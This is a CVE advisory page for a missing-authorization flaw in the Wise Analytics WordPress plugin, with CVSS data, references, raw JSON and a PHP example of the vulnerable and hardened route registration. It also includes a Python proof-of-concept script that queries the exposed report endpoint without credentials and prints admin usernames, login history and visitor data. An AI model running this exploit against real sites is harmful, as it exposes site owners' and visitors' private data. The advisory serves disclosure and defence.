Security Vulnerability Report
CVE-2025-14609 CVSS 5.3 MEDIUM


Published: 2026-01-24 08:16:06
Last Modified: 2026-04-15 00:35:42

Description

The Wise Analytics plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.1.9. This is due to missing capability checks on the REST API endpoint '/wise-analytics/v1/report'. This makes it possible for unauthenticated attackers to access sensitive analytics data including administrator usernames, login timestamps, visitor tracking information, and business intelligence data via the 'name' parameter granted they can send unauthenticated requests.
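The root cause named above is CWE-862: the route is registered without a capability check, so the REST server dispatches anonymous requests straight to the report handler and the 'name' parameter picks which data set comes back. The block below is an added illustration of that pattern and of the hardened registration; it is not the Wise Analytics plugin's own code. The namespace and route ('wise-analytics/v1', '/report') and the 'name' parameter are taken from the advisory; the handler name, the 'manage_options' capability, the report-name allowlist and the mu-plugin hotfix at the end are assumptions made for the example.

```php
<?php
/**
 * Added illustration for CVE-2025-14609 (CWE-862, Missing Authorization).
 * NOT the plugin's code: route and 'name' parameter come from the advisory,
 * everything else (handler, capability, allowlist, hotfix) is assumed.
 */

// Handler. For the example it only echoes the requested report name; in a
// real plugin this is where usernames, login timestamps and visitor data
// would be read from the database and returned to the caller.
function wa_example_report_handler( WP_REST_Request $request ) {
    return rest_ensure_response( array( 'report' => $request->get_param( 'name' ) ) );
}

// VULNERABLE PATTERN. '__return_true' tells the REST server that every caller
// is authorized, so the handler runs for anonymous requests as well. Omitting
// permission_callback entirely behaves the same way (core only logs a
// _doing_it_wrong notice; it does not block the request).
function wa_example_register_vulnerable() {
    register_rest_route( 'wise-analytics/v1', '/report', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'wa_example_report_handler',
        'permission_callback' => '__return_true', // the bug: no capability check
        'args'                => array(
            'name' => array( 'type' => 'string', 'required' => true ),
        ),
    ) );
}

// HARDENED PATTERN. Authorization is decided in permission_callback, before the
// handler is reached, and 'name' is constrained to known report identifiers so
// the parameter cannot be used to select arbitrary data sets.
function wa_example_register_fixed() {
    // Hypothetical allowlist; the plugin's real report names are not given here.
    $allowed_reports = array( 'pageviews', 'referrers', 'top_pages' );

    register_rest_route( 'wise-analytics/v1', '/report', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'wa_example_report_handler',
        'permission_callback' => function () {
            if ( current_user_can( 'manage_options' ) ) {
                return true;
            }
            // 401 for anonymous callers, 403 for logged-in users lacking the capability.
            return new WP_Error(
                'rest_forbidden',
                'You are not allowed to view analytics reports.',
                array( 'status' => rest_authorization_required_code() )
            );
        },
        'args'                => array(
            'name' => array(
                'type'     => 'string',
                'required' => true,
                'enum'     => $allowed_reports,
            ),
        ),
    ) );
}
add_action( 'rest_api_init', 'wa_example_register_fixed' );

// HOTFIX (assumed mu-plugin) for sites that cannot update yet: refuse the route
// before dispatch unless the caller holds the capability. rest_pre_dispatch
// short-circuits the request as soon as the filter returns a non-null value.
add_filter( 'rest_pre_dispatch', function ( $result, WP_REST_Server $server, WP_REST_Request $request ) {
    if ( '/wise-analytics/v1/report' === $request->get_route()
        && ! current_user_can( 'manage_options' ) ) {
        return new WP_Error(
            'rest_forbidden',
            'Forbidden.',
            array( 'status' => rest_authorization_required_code() )
        );
    }
    return $result;
}, 10, 3 );
```

Two points worth checking when applying this pattern: the capability test has to live in permission_callback (or equivalently in a pre-dispatch filter), not only in the handler, because that is the only hook the REST server consults before running the callback; and a bare request with no X-WP-Nonce header or application-password credentials is treated by WordPress as anonymous, which is exactly what the PoC below sends and why current_user_can() correctly returns false for it.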

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Wise Analytics Plugin <= 1.1.9 (all versions up to and including 1.1.9)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import json
import sys

import requests

# CVE-2025-14609 PoC - Unauthenticated Access to Wise Analytics REST API
# Target: WordPress site with Wise Analytics plugin <= 1.1.9 (per the advisory)
#
# The advisory only states that the 'name' parameter selects the data set
# returned; it does not list valid values. The names used below are guesses
# made by this PoC and may need to be adjusted for a real target.

ENDPOINT_PATH = "/wp-json/wise-analytics/v1/report"


def exploit_wise_analytics(target_url):
    """
    Exploit for Missing Authorization in Wise Analytics plugin
    Endpoint: /wp-json/wise-analytics/v1/report
    """
    endpoint = f"{target_url.rstrip('/')}{ENDPOINT_PATH}"
    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-14609-PoC)',
    }
    # Payload requesting a data set; no cookie, nonce or credentials are sent
    payload = {
        'name': 'admin_users',  # guessed report name
        'filters': {
            'date_range': 'all',
        },
    }

    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting endpoint: {endpoint}")
    try:
        # Send unauthenticated request
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

    if response.status_code != 200:
        # A patched site answers 401 (anonymous) or 403 (insufficient capability)
        print(f"[-] Request failed with status: {response.status_code}")
        return None

    try:
        data = response.json()
    except ValueError:
        print("[-] Response was not JSON:")
        print(response.text[:500])
        return None

    print("[+] Success! Retrieved sensitive data:")
    print(json.dumps(data, indent=2))
    return data


# Alternative: GET request for enumeration
def enumerate_data(target_url):
    """Enumerate available data through the vulnerable endpoint"""
    endpoint = f"{target_url.rstrip('/')}{ENDPOINT_PATH}"
    # Candidate data set names (guesses, see note at top of file)
    data_types = ['admin_users', 'login_history', 'visitor_tracking', 'business_intel']
    for data_type in data_types:
        params = {'name': data_type}
        try:
            response = requests.get(endpoint, params=params, timeout=10)
        except requests.exceptions.RequestException as e:
            print(f"[-] {data_type}: request error: {e}")
            continue
        if response.status_code == 200:
            print(f"[+] Found data type: {data_type}")
            print(response.text)
        else:
            print(f"[-] {data_type}: HTTP {response.status_code}")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
        exploit_wise_analytics(target)
        enumerate_data(target)
    else:
        print("Usage: python cve-2025-14609.py <target_url>")
        print("Example: python cve-2025-14609.py http://victim.com")

References

https://plugins.trac.wordpress.org/browser/wise-analytics/tags/1.1.9/src/Endpoints/ReportsEndpoint.php#L43 (vulnerable endpoint registration in the last affected release)
https://plugins.trac.wordpress.org/browser/wise-analytics/trunk/src/Endpoints/ReportsEndpoint.php#L43 (same file in trunk)
https://plugins.trac.wordpress.org/changeset/3446670/ (fix changeset)
https://www.wordfence.com/threat-intel/vulnerabilities/id/d92c80cb-080b-4774-8c66-1d5cf68e771f?source=cve (Wordfence advisory)

Weakness: CWE-862 (Missing Authorization)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14609",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-24T08:16:05.543",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Wise Analytics plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.1.9. This is due to missing capability checks on the REST API endpoint '/wise-analytics/v1/report'. This makes it possible for unauthenticated attackers to access sensitive analytics data including administrator usernames, login timestamps, visitor tracking information, and business intelligence data via the 'name' parameter granted they can send unauthenticated requests."
      },
      {
        "lang": "es",
        "value": "El plugin Wise Analytics para WordPress es vulnerable a la falta de autorización en todas las versiones hasta la 1.1.9, inclusive. Esto se debe a la falta de comprobaciones de capacidad en el endpoint de la API REST '/wise-analytics/v1/report'. Esto permite que atacantes no autenticados accedan a datos analíticos sensibles, incluyendo nombres de usuario de administrador, marcas de tiempo de inicio de sesión, información de seguimiento de visitantes y datos de inteligencia de negocio, a través del parámetro 'name', siempre que puedan enviar solicitudes no autenticadas."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/wise-analytics/tags/1.1.9/src/Endpoints/ReportsEndpoint.php#L43",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/wise-analytics/trunk/src/Endpoints/ReportsEndpoint.php#L43",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3446670/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d92c80cb-080b-4774-8c66-1d5cf68e771f?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}